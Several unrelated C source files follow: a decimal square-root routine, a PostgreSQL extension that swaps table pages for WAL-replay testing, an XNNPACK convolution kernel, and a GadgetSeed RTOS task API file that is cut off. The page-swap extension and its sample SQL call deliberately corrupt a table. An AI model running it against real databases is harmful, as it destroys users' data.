fegetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif exponent_x = exponent_x - DECIMAL_EXPONENT_BIAS + DECIMAL_EXPONENT_BIAS_128; // 2^64 f64.i = 0x5f800000; // fx ~ CX fx.d = (float) CX.w[1] * f64.d + (float) CX.w[0]; bin_expon_cx = ((fx.i >> 23) & 0xff) - 0x7f; digits = bid_estimate_decimal_digits[bin_expon_cx]; A10 = CX; if (exponent_x & 1) { A10.w[1] = (CX.w[1] << 3) | (CX.w[0] >> 61); A10.w[0] = CX.w[0] << 3; CX2.w[1] = (CX.w[1] << 1) | (CX.w[0] >> 63); CX2.w[0] = CX.w[0] << 1; __add_128_128 (A10, A10, CX2); } CS.w[0] = short_sqrt128 (A10); CS.w[1] = 0; // check for exact result if (CS.w[0] * CS.w[0] == A10.w[0]) { __mul_64x64_to_128_fast (S2, CS.w[0], CS.w[0]); if (S2.w[1] == A10.w[1]) { bid_get_BID128_very_fast (&res, 0, (exponent_x + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); } } // get number of digits in CX D = CX.w[1] - bid_power10_index_binexp_128[bin_expon_cx].w[1]; if (D > 0 || (!D && CX.w[0] >= bid_power10_index_binexp_128[bin_expon_cx].w[0])) digits++; // if exponent is odd, scale coefficient by 10 scale = 67 - digits; exponent_q = exponent_x - scale; scale += (exponent_q & 1); // exp. 
bias is even if (scale > 38) { T128 = bid_power10_table_128[scale - 37]; __mul_128x128_low (CX1, CX, T128); TP128 = bid_power10_table_128[37]; __mul_128x128_to_256 (C256, CX1, TP128); } else { T128 = bid_power10_table_128[scale]; __mul_128x128_to_256 (C256, CX, T128); } // 4*C256 C4.w[3] = (C256.w[3] << 2) | (C256.w[2] >> 62); C4.w[2] = (C256.w[2] << 2) | (C256.w[1] >> 62); C4.w[1] = (C256.w[1] << 2) | (C256.w[0] >> 62); C4.w[0] = C256.w[0] << 2; bid_long_sqrt128 (&CS, C256); #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY if (!((rnd_mode) & 3)) { #endif #endif // compare to midpoints CSM.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); CSM.w[0] = (CS.w[0] + CS.w[0]) | 1; // CSM^2 //__mul_128x128_to_256(M256, CSM, CSM); __sqr128_to_256 (M256, CSM); if (C4.w[3] > M256.w[3] || (C4.w[3] == M256.w[3] && (C4.w[2] > M256.w[2] || (C4.w[2] == M256.w[2] && (C4.w[1] > M256.w[1] || (C4.w[1] == M256.w[1] && C4.w[0] > M256.w[0])))))) { // round up CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } else { C8.w[1] = (CS.w[1] << 3) | (CS.w[0] >> 61); C8.w[0] = CS.w[0] << 3; // M256 - 8*CSM __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; // if CSM' > C256, round up if (M256.w[3] > C4.w[3] || (M256.w[3] == C4.w[3] && (M256.w[2] > C4.w[2] || (M256.w[2] == C4.w[2] && (M256.w[1] > C4.w[1] || (M256.w[1] == C4.w[1] && M256.w[0] > C4.w[0])))))) { // round down if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY } else { __sqr128_to_256 (M256, CS); C8.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); C8.w[0] = CS.w[0] << 1; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (!CS.w[0]) CS.w[1]--; CS.w[0]--; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } else { __add_carry_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __add_carry_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __add_carry_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] + Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (M256.w[3] < C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] < C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] < C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] <= C256.w[0])))))) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } // RU? if ((rnd_mode) == BID_ROUNDING_UP) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } #endif #endif #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INEXACT_EXCEPTION); #endif bid_get_BID128_fast (&res, 0, (exponent_q + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); }
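/*
 * Editor's note: both round-to-nearest paths above hinge on the identity
 * sqrt(C) - CS > 1/2  <=>  4*C > (2*CS + 1)^2, evaluated in 256-bit
 * arithmetic (C4 compared against CSM squared). Below is a self-contained
 * 64-bit illustration of the same test; isqrt_nearest() is not part of
 * the library.
 */
#include <stdint.h>
#include <math.h>

/* nearest-integer square root, valid for n up to about 2^60 */
static uint64_t isqrt_nearest(uint64_t n)
{
    uint64_t s = (uint64_t)sqrt((double)n);

    /* correct any floating-point error so that s = floor(sqrt(n)) */
    while (s * s > n)
        s--;
    while ((s + 1) * (s + 1) <= n)
        s++;

    /* round up exactly when the fractional part of sqrt(n) exceeds 1/2 */
    if (4 * n > (2 * s + 1) * (2 * s + 1))
        s++;

    return s;
}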
428824.c
/*-------------------------------------------------------------------------
 *
 * pg_swap_pages.c
 *		Extension swapping pages of a relation via WAL replay.
 *
 * Copyright (c) 1996-2021, PostgreSQL Global Development Group
 *
 * IDENTIFICATION
 *		pg_swap_pages/pg_swap_pages.c
 *
 *-------------------------------------------------------------------------
 */
#include "postgres.h"
#include "fmgr.h"

#include "access/generic_xlog.h"
#include "access/heapam.h"
#include "storage/bufmgr.h"
#include "storage/bufpage.h"
#include "utils/relcache.h"

PG_MODULE_MAGIC;

/*
 * Swap two pages of a relation and WAL-log the change. This can easily
 * corrupt a system; it is meant for WAL-replay testing only.
 */
PG_FUNCTION_INFO_V1(pg_swap_pages);

Datum
pg_swap_pages(PG_FUNCTION_ARGS)
{
	Oid			relid = PG_GETARG_OID(0);
	uint32		blkno1 = PG_GETARG_UINT32(1);
	uint32		blkno2 = PG_GETARG_UINT32(2);
	Relation	rel;
	Buffer		buf1, buf2;
	Page		page1, page2;
	char		raw_page[BLCKSZ];
	GenericXLogState *state;

	rel = relation_open(relid, AccessShareLock);

	/* Some sanity checks */
	if (blkno1 > MaxBlockNumber)
		ereport(ERROR,
				(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
				 errmsg("invalid block number 1")));
	if (blkno2 > MaxBlockNumber)
		ereport(ERROR,
				(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
				 errmsg("invalid block number 2")));
	if (blkno1 >= RelationGetNumberOfBlocksInFork(rel, MAIN_FORKNUM))
		ereport(ERROR,
				(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
				 errmsg("block number 1 %u is out of range for relation \"%s\"",
						blkno1, RelationGetRelationName(rel))));
	if (blkno2 >= RelationGetNumberOfBlocksInFork(rel, MAIN_FORKNUM))
		ereport(ERROR,
				(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
				 errmsg("block number 2 %u is out of range for relation \"%s\"",
						blkno2, RelationGetRelationName(rel))));

	/*
	 * Read and lock both buffers. The locks must be exclusive: the pages
	 * are modified below, and GenericXLogFinish() marks the registered
	 * buffers dirty, which requires an exclusive content lock.
	 */
	buf1 = ReadBufferExtended(rel, MAIN_FORKNUM, blkno1, RBM_NORMAL, NULL);
	LockBuffer(buf1, BUFFER_LOCK_EXCLUSIVE);
	buf2 = ReadBufferExtended(rel, MAIN_FORKNUM, blkno2, RBM_NORMAL, NULL);
	LockBuffer(buf2, BUFFER_LOCK_EXCLUSIVE);

	/* Now generate WAL records registering both buffers and swapping them */
	state = GenericXLogStart(rel);
	page1 = GenericXLogRegisterBuffer(state, buf1, GENERIC_XLOG_FULL_IMAGE);
	page2 = GenericXLogRegisterBuffer(state, buf2, GENERIC_XLOG_FULL_IMAGE);

	/* Switch the pages' contents */
	memcpy(raw_page, page1, BLCKSZ);
	memcpy(page1, page2, BLCKSZ);
	memcpy(page2, raw_page, BLCKSZ);

	/* Time to log the changes */
	GenericXLogFinish(state);

	/* cleanup and finish */
	LockBuffer(buf1, BUFFER_LOCK_UNLOCK);
	LockBuffer(buf2, BUFFER_LOCK_UNLOCK);
	ReleaseBuffer(buf1);
	ReleaseBuffer(buf2);
	relation_close(rel, AccessShareLock);

	PG_RETURN_NULL();
}
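/*
 * Editor's note: the SQL glue that exposes this function is not part of this
 * file. A plausible wrapper (an assumption following the usual extension
 * layout, e.g. a pg_swap_pages--1.0.sql script) and a sample call:
 *
 *   CREATE FUNCTION pg_swap_pages(regclass, int4, int4)
 *     RETURNS void
 *     AS 'MODULE_PATHNAME', 'pg_swap_pages'
 *     LANGUAGE C STRICT;
 *
 *   -- swap blocks 0 and 1 of relation my_table, WAL-logging full images
 *   SELECT pg_swap_pages('my_table'::regclass, 0, 1);
 *
 * Swapping pages of a live table deliberately corrupts it (indexes and
 * ctids keep pointing at the old block numbers); this is a WAL-replay
 * test tool, not something to run on data you care about.
 */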
56821.c
// Auto-generated file. Do not edit! // Template: src/f32-dwconv/up-neon.c.in // Generator: tools/xngen // // Copyright 2019 Google LLC // // This source code is licensed under the BSD-style license found in the // LICENSE file in the root directory of this source tree. #include <assert.h> #include <arm_neon.h> #include <xnnpack/dwconv.h> void xnn_f32_dwconv_ukernel_up4x9__neonfma( size_t channels, size_t output_width, const float** input, const float* weights, float* output, size_t input_stride, size_t output_increment, const union xnn_f32_output_params params[restrict static 1]) { assert(channels != 0); assert(output_width != 0); const float32x4_t vmax = vld1q_dup_f32(&params->scalar.max); const float32x4_t vmin = vld1q_dup_f32(&params->scalar.min); do { const float* i0 = input[0]; assert(i0 != NULL); const float* i1 = input[1]; assert(i1 != NULL); const float* i2 = input[2]; assert(i2 != NULL); const float* i3 = input[3]; assert(i3 != NULL); const float* i4 = input[4]; assert(i4 != NULL); const float* i5 = input[5]; assert(i5 != NULL); const float* i6 = input[6]; assert(i6 != NULL); const float* i7 = input[7]; assert(i7 != NULL); const float* i8 = input[8]; assert(i8 != NULL); input = (const float**) ((uintptr_t) input + input_stride); size_t c = channels; const float* w = weights; for (; c >= 4; c -= 4) { float32x4_t vacc0123p0 = vld1q_f32(w); w += 4; const float32x4_t vi0x0123 = vld1q_f32(i0); i0 += 4; const float32x4_t vk0x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi0x0123, vk0x0123); const float32x4_t vi1x0123 = vld1q_f32(i1); i1 += 4; const float32x4_t vk1x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi1x0123, vk1x0123); const float32x4_t vi2x0123 = vld1q_f32(i2); i2 += 4; const float32x4_t vk2x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi2x0123, vk2x0123); const float32x4_t vi3x0123 = vld1q_f32(i3); i3 += 4; const float32x4_t vk3x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi3x0123, vk3x0123); const float32x4_t vi4x0123 = vld1q_f32(i4); i4 += 4; const float32x4_t vk4x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi4x0123, vk4x0123); const float32x4_t vi5x0123 = vld1q_f32(i5); i5 += 4; const float32x4_t vk5x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi5x0123, vk5x0123); const float32x4_t vi6x0123 = vld1q_f32(i6); i6 += 4; const float32x4_t vk6x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi6x0123, vk6x0123); const float32x4_t vi7x0123 = vld1q_f32(i7); i7 += 4; const float32x4_t vk7x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi7x0123, vk7x0123); const float32x4_t vi8x0123 = vld1q_f32(i8); i8 += 4; const float32x4_t vk8x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi8x0123, vk8x0123); float32x4_t vacc0123 = vmaxq_f32(vacc0123p0, vmin); vacc0123 = vminq_f32(vacc0123, vmax); vst1q_f32(output, vacc0123); output += 4; } if XNN_UNLIKELY(c != 0) { float32x4_t vacc0123p0 = vld1q_f32(w); w += 4; const float32x4_t vi0x0123 = vld1q_f32(i0); const float32x4_t vk0x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi0x0123, vk0x0123); const float32x4_t vi1x0123 = vld1q_f32(i1); const float32x4_t vk1x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi1x0123, vk1x0123); const float32x4_t vi2x0123 = vld1q_f32(i2); const float32x4_t vk2x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi2x0123, vk2x0123); const float32x4_t vi3x0123 = vld1q_f32(i3); const float32x4_t vk3x0123 = 
vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi3x0123, vk3x0123); const float32x4_t vi4x0123 = vld1q_f32(i4); const float32x4_t vk4x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi4x0123, vk4x0123); const float32x4_t vi5x0123 = vld1q_f32(i5); const float32x4_t vk5x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi5x0123, vk5x0123); const float32x4_t vi6x0123 = vld1q_f32(i6); const float32x4_t vk6x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi6x0123, vk6x0123); const float32x4_t vi7x0123 = vld1q_f32(i7); const float32x4_t vk7x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi7x0123, vk7x0123); const float32x4_t vi8x0123 = vld1q_f32(i8); const float32x4_t vk8x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi8x0123, vk8x0123); float32x4_t vacc0123 = vmaxq_f32(vacc0123p0, vmin); vacc0123 = vminq_f32(vacc0123, vmax); float32x2_t vacc01 = vget_low_f32(vacc0123); if (c & 2) { vst1_f32(output, vacc01); output += 2; vacc01 = vget_high_f32(vacc0123); } if (c & 1) { vst1_lane_f32(output, vacc01, 0); output += 1; } } output = (float*) ((uintptr_t) output + output_increment); } while (--output_width != 0); }
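/*
 * Editor's note: a scalar reference for what the micro-kernel above computes
 * at one output pixel, handy as a test oracle. The real kernel reads weights
 * in packed order (4 bias values followed by 9 groups of 4 tap weights per
 * 4-channel group); the plain bias[]/kernel[] layout below is a
 * simplification for clarity, not the packed layout.
 */
#include <stddef.h>

static void dwconv_up9_ref(size_t channels,
                           const float *input[9],  /* one pointer per tap */
                           const float *bias,      /* [channels] */
                           const float *kernel,    /* [9 * channels], tap-major */
                           float output_min, float output_max,
                           float *output)
{
    for (size_t c = 0; c < channels; c++) {
        float acc = bias[c];
        for (size_t t = 0; t < 9; t++) {
            acc += input[t][c] * kernel[t * channels + c];
        }
        /* clamp like the vmin/vmax pair in the vector kernel */
        if (acc < output_min) acc = output_min;
        if (acc > output_max) acc = output_max;
        output[c] = acc;
    }
}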
281718.c
/**
   @file
   @brief   Task control API

   These functions must be called from task context.

   @date    2017.11.25
   @author  Takashi SHUDO

   @page task_syscall Task control

   The GadgetSeed kernel is a multitasking kernel.

   GadgetSeed provides the following inter-task synchronization
   facilities:

   - @ref event
   - @ref mutex


   @section task_status Task states

   Each GadgetSeed task transitions between the following states.

   ![Task states](task_status.svg)

   | State name    | Description                           |
   |:--------------|:--------------------------------------|
   | READY         | Ready to run                          |
   | RUN           | Running                               |
   | TIMER_WAIT    | Waiting on a timer                    |
   | EVENT_WAIT    | Waiting for an event                  |
   | MUTEX_WAIT    | Waiting for a MUTEX to be unlocked    |
   | REQUEST_WAIT  | Waiting to be woken up                |
   | DORMANT_WAIT  | Dormant                               |

   ---

   @section task_context Task context

   A task context is defined by the following structure:

   @ref st_tcb

   @copybrief st_tcb

   Each user-created task must statically define an st_tcb structure.

   A task can be given a name.

   Tasks have priorities. By default eight priority levels are
   available, from 0 (highest) to 7 (lowest). The number of priority
   levels can be changed by defining the configuration macro
   GSC_KERNEL_MAX_TASK_PRIORITY.

   Stack memory must be statically defined for each task.

   As an example of starting a task, see the task_exec() call made
   from init_gs().

   For the task APIs, see @ref task_api.

   ---

   @section event Events

   GadgetSeed provides events as a synchronization mechanism similar
   to the event flags of a typical RTOS.

   The @ref event_api can be used to synchronize between tasks, and
   between tasks and non-task contexts such as interrupt handlers.
   The @ref not_task_event_api can only signal that an event has
   occurred.

   For example, a task calls event_wait() and an I/O interrupt handler
   calls event_wakeup_ISR(), so the task waits for I/O data to arrive.
   In this case the task that called event_wait() stays in the
   EVENT_WAIT state until the I/O interrupt handler executes
   event_wakeup_ISR().

   To use events, define the event structure shown below and register
   it with the system using eventqueue_register() or
   eventqueue_register_ISR().

   @ref st_event

   @copybrief st_event

   For the event APIs, see @ref event_api.

   ---

   @section mutex MUTEX

   GadgetSeed provides a MUTEX mechanism for exclusive access to
   resources.

   The MUTEX APIs can only be called from tasks.

   Only the task that locked a MUTEX can unlock it.

   To use a MUTEX, define the MUTEX structure shown below and register
   it with the system using mutex_register() or mutex_register_ISR().

   @ref st_mutex

   @copybrief st_mutex

   For the MUTEX APIs, see @ref mutex_api.

   ---

   @section task_api Task control API

   Include file: syscall.h

   | API                       | Function                      |
   |:--------------------------|:------------------------------|
   | task_add()                | @copybrief task_add           |
   | task_exec()               | @copybrief task_exec          |
   | task_exit()               | @copybrief task_exit          |
   | task_pause()              | @copybrief task_pause         |
   | task_sleep()              | @copybrief task_sleep         |
   | task_kill()               | @copybrief task_kill          |
   | task_wakeup()             | @copybrief task_wakeup        |
   | task_wakeup_id_ISR()      | @copybrief task_wakeup_id_ISR |

   ---

   @section event_api Event API

   @subsection task_event_api For task context

   Include file: syscall.h

   | API                       | Function                              |
   |:--------------------------|:--------------------------------------|
   | eventqueue_register()     | @copybrief eventqueue_register        |
   | event_wait()              | @copybrief event_wait                 |
   | event_check()             | @copybrief event_check                |
   | event_clear()             | @copybrief event_clear                |
   | event_wakeup()            | @copybrief event_wakeup               |
   | eventqueue_unregister()   | @copybrief eventqueue_unregister      |

   @subsection not_task_event_api For non-task context (system initialization / interrupt handlers)

   Include file: task/event.h

   | API                         | Function                              |
   |:----------------------------|:--------------------------------------|
   | eventqueue_register_ISR()   | @copybrief eventqueue_register_ISR    |
   | event_push_ISR()            | @copybrief event_push_ISR             |
   | event_set_ISR()             | @copybrief event_set_ISR              |
   | event_wakeup_ISR()          | @copybrief event_wakeup_ISR           |
   | eventqueue_unregister_ISR() | @copybrief eventqueue_unregister_ISR  |

   ---

   @section mutex_api MUTEX API

   @subsection task_mutex_api For task context

   Include file: syscall.h

   | API                       | Function                      |
   |:--------------------------|:------------------------------|
   | mutex_register()          | @copybrief mutex_register     |
   | mutex_lock()              | @copybrief mutex_lock         |
   | mutex_unlock()            | @copybrief mutex_unlock       |
   | mutex_unregister()        | @copybrief mutex_unregister   |

   @subsection not_task_mutex_api For non-task context (system initialization / interrupt handlers)

   Include file: task/mutex.h

   | API                       | Function                              |
   |:--------------------------|:--------------------------------------|
   | mutex_register_ISR()      | @copybrief mutex_register_ISR         |
   | mutex_unregister_ISR()    | @copybrief mutex_unregister_ISR       |
*/

#include "syscall.h"
#include "syscall_param.h"
#include "task_opration.h"

//#define DEBUGKBITS 0x01
#include "dkprintf.h"


/**
   @brief	Add a task

   This function only adds the task to the run queue; the added task
   does not enter the running state.

   @param[in]	func		Task function
   @param[in]	name		Pointer to the task name string
   @param[in]	priority	Task priority
   @param[in]	tcb		Pointer to the task context
   @param[in]	stack		Pointer to the task stack
   @param[in]	stack_size	Task stack size
   @param[in]	arg		Pointer to the task start argument

   @return	!=0: error
*/
int task_add(task_func func, char *name, int priority, struct st_tcb *tcb,
	     unsigned int *stack, int stack_size, void *arg)
{
	volatile struct exec_task_param param;

	DKFPRINTF(0x01, "\n");

	if(priority >= GSC_KERNEL_MAX_TASK_PRIORITY) {
		return -1;
	}

	param.func	= func;
	param.name	= name;
	param.priority	= priority;
	param.tcb	= tcb;
	param.stack	= stack;
	param.stack_size= stack_size;
	param.arg	= arg;

	DKPRINTF(0x01, "exec param = %p\n", &param);
	DKPRINTF(0x01, "exec func = %p\n", param.func);
	DKPRINTF(0x01, "exec name = \"%s\"\n", param.name);

	sys_call(SYSCALL_TASK_ADD, (void *)&param);

	return param.ret;
}

/**
   @brief	Add and start a task

   Adds the task to the run queue and makes the added task runnable.

   @param[in]	func		Task function
   @param[in]	name		Pointer to the task name string
   @param[in]	priority	Task priority
   @param[in]	tcb		Pointer to the task context
   @param[in]	stack		Pointer to the task stack
   @param[in]	stack_size	Task stack size
   @param[in]	arg		Pointer to the task start argument

   @return	!=0: error
*/
int task_exec(task_func func, char *name, int priority, struct st_tcb *tcb,
	      unsigned int *stack, int stack_size, void *arg)
{
	volatile struct exec_task_param param;

	DKFPRINTF(0x01, "\n");

	if(priority >= GSC_KERNEL_MAX_TASK_PRIORITY) {
		return -1;
	}

	param.func	= func;
	param.name	= name;
	param.priority	= priority;
	param.tcb	= tcb;
	param.stack	= stack;
	param.stack_size= stack_size;
	param.arg	= arg;

	DKPRINTF(0x01, "exec param = %p\n", &param);
	DKPRINTF(0x01, "exec func = %p\n", param.func);
	DKPRINTF(0x01, "exec name = \"%s\"\n", param.name);

	sys_call(SYSCALL_TASK_EXEC, (void *)&param);

	return param.ret;
}

/**
   @brief	Terminate the calling task

   The task that calls this function terminates and is removed from the
   run queue.
*/
void task_exit(void)
{
	DKFPRINTF(0x01, "\n");

	sys_call(SYSCALL_TASK_EXIT, (void *)0);
}

/**
   @brief	Pause the calling task

   The task that calls this function is suspended.
*/
void task_pause(void)
{
	DKFPRINTF(0x01, "\n");

	sys_call(SYSCALL_TASK_PAUSE, (void *)0);
}

/**
   @brief	Put the calling task into the timer-wait state for a given time

   Suspends the calling task for stime milliseconds.

   @param[in]	stime	Sleep time (msec)
*/
void task_sleep(unsigned int stime)
{
	DKFPRINTF(0x01, "stime = %u\n", stime);

	sys_call(SYSCALL_TASK_SLEEP, (void *)(long)stime);
}

/**
   @brief	Terminate the specified task

   Terminates the task specified by id.

   @param[in]	id	Task ID
*/
void task_kill(int id)
{
	DKFPRINTF(0x01, "id = %d\n", id);

	sys_call(SYSCALL_TASK_KILL, (void *)(long)id);
}

/**
   @brief	Make the specified task runnable

   Makes the task specified by id runnable.

   @param[in]	id	Task ID
*/
void task_wakeup(int id)
{
	DKFPRINTF(0x01, "id = %d\n", id);

	sys_call(SYSCALL_TASK_WAKEUP, (void *)(long)id);
}

/**
   @brief	Set the priority of the specified task

   Sets the priority of the task specified by id.

   @param[in]	id		Task ID
   @param[in]	priority	Priority
*/
void task_priority(int id, int priority)
{
	volatile struct st_task_priority_param param;

	DKFPRINTF(0x01, "\n");

	param.id = id;
	param.priority = priority;

	sys_call(SYSCALL_TASK_PRIORITY, (void *)&param);
}


/*
 * Events
 */

/**
   @brief	Register an event queue

   @param[in]	evtque	Pointer to the event queue
   @param[in]	name	Pointer to the event queue name string
   @param[in]	args	Pointer to the event argument buffer
   @param[in]	size	Size of one event argument
   @param[in]	count	Number of events that can be queued
*/
void eventqueue_register(struct st_event *evtque, const char *name,
			 void *args, unsigned int size, int count)
{
	volatile struct evtque_param param;

	DKFPRINTF(0x01, "evtque = \"%s\" %p size = %u, count = %d\n", name,
		  evtque, size, count);

	param.evtque	= evtque;
	param.name	= name;
	param.arg	= args;
	param.size	= size;
	param.count	= count;

	sys_call(SYSCALL_EVTQUE_INIT, (void *)&param);
}

/**
   @brief	Put the calling task into the event-wait state

   @param[in]	evtque	Pointer to the event queue
   @param[out]	arg	Pointer to the event argument
   @param[in]	timeout	Event wait timeout (msec)

   @return	Remaining wait time (msec) (<0: timed out)
*/
int event_wait(struct st_event *evtque, void *arg, unsigned int timeout)
{
	volatile struct evtque_param param;

	DKFPRINTF(0x01, "evtque = \"%s\" %p timeout = %u\n", evtque->name,
		  evtque, timeout);

	param.evtque	= evtque;
	param.timeout	= timeout;
	param.arg	= arg;
	param.ret	= -1;	// so that -1 is returned on timeout

	DKPRINTF(0x01, "exec param = %p\n", &param);
	DKPRINTF(0x01, "evtque = %p\n", param.evtque);
	DKPRINTF(0x01, "arg = %p\n", param.arg);
	DKPRINTF(0x01, "timeout = %u\n", (unsigned int)param.timeout);
	KXDUMP(0x02, arg, evtque->size);

	if(run_task == &dummy_task) {
#ifndef GSC_TARGET_SYSTEM_EMU
		SYSERR_PRINT("No running task\n");
		print_queues();
#endif
		return 0;
	}

	sys_call(SYSCALL_EVTQUE_WAIT, (void *)&param);

	return param.ret;
}

/**
   @brief	Check whether any events are queued in an event queue

   @param[in]	evtque	Pointer to the event queue

   @return	Number of queued events (=0: no events queued)
*/
int event_check(struct st_event *evtque)
{
	volatile struct evtque_param param;

	DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque);

	param.evtque	= evtque;
	param.ret	= 0;

	if(run_task == &dummy_task) {
#ifndef GSC_TARGET_SYSTEM_EMU
		SYSERR_PRINT("No running task\n");
		print_queues();
#endif
		return 0;
	}

	sys_call(SYSCALL_EVTQUE_CHECK, (void *)&param);

	return param.ret;
}

/**
   @brief	Remove all events queued in an event queue

   @param[in]	evtque	Pointer to the event queue
*/
void event_clear(struct st_event *evtque)
{
	DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque);

	if(run_task == &dummy_task) {
#ifndef GSC_TARGET_SYSTEM_EMU
		SYSERR_PRINT("No running task\n");
		print_queues();
#endif
		return;
	}

	sys_call(SYSCALL_EVTQUE_CLEAR, (void *)evtque);
}

/**
   @brief	Post an event to an event queue

   Any task waiting on this event queue is woken up.

   @param[in]	evtque	Pointer to the event queue
   @param[in]	arg	Pointer to the event argument
*/
void event_wakeup(struct st_event *evtque, void *arg)
{
	volatile struct evtque_param param;

	DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque);
	KXDUMP(0x02, arg, evtque->size);

	param.evtque	= evtque;
	param.arg	= arg;

	if(run_task == &dummy_task) {
#ifndef GSC_TARGET_SYSTEM_EMU
		SYSERR_PRINT("No running task\n");
		print_queues();
#endif
		return;
	}

	sys_call(SYSCALL_EVTQUE_WAKEUP, (void *)&param);
}

/**
   @brief	Unregister an event queue

   @param[in]	evtque	Pointer to the event queue
*/
void eventqueue_unregister(struct st_event *evtque)
{
	DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque);

	sys_call(SYSCALL_EVTQUE_DISPOSE, (void *)evtque);
}


/*
 * MUTEX
 */

/**
   @brief	Register a MUTEX

   @param[in]	mutex	Pointer to the MUTEX
   @param[in]	name	Pointer to the MUTEX name string
*/
void mutex_register(struct st_mutex *mutex, const char *name)
{
	volatile struct mutex_param param;

	DKFPRINTF(0x01, "mutex = \"%s\" %p\n", name, mutex);

	param.mutex	= mutex;
	param.name	= name;

	sys_call(SYSCALL_MUTEX_INIT, (void *)&param);
}

/**
   @brief	Lock a MUTEX

   @param[in]	mutex	Pointer to the MUTEX
   @param[in]	timeout	Timeout (msec)

   @return	Remaining wait time (msec) (<0: timed out)
*/
int mutex_lock(struct st_mutex *mutex, unsigned int timeout)
{
	volatile struct mutex_param param;

	DKFPRINTF(0x01, "mutex = \"%s\" %p timeout = %u\n", mutex->name,
		  mutex, timeout);

	param.mutex	= mutex;
	param.timeout	= timeout;

	DKPRINTF(0x01, "exec param = %p\n", &param);
	DKPRINTF(0x01, "mutex = %p\n", param.mutex);
	DKPRINTF(0x01, "timeout = %08X\n", (unsigned int)param.timeout);

	sys_call(SYSCALL_MUTEX_LOCK, (void *)&param);

	return param.ret;
}

/**
   @brief	Unlock a MUTEX

   @param[in]	mutex	Pointer to the MUTEX

   @return	Remaining wait time (msec) (=0: MUTEX with no timeout specified)
*/
int mutex_unlock(struct st_mutex *mutex)
{
	volatile struct mutex_param param;

